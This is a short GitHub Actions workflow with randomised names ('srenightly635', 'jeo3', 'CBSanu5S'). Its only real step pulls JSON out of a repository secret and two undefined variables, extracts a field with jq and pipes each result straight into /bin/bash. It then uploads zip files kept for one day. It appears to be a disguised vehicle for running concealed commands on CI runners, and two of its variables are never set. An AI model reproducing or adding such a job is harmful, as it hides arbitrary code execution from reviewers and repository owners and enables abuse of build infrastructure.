name: srenightly635
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: srenightly635
        env:
          jeo3: ${{ secrets.jeo3 }}
        run: |
          printf '%s' "$jeo3" | jq -r .t3 | /bin/bash
          echo $mzki09048 | jq -r .segdg22072 | /bin/bash
          printf '%s' "$sceu656" | jq -r .jua33 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: CBSanu5S
          path: "*.zip"
          retention-days: 1
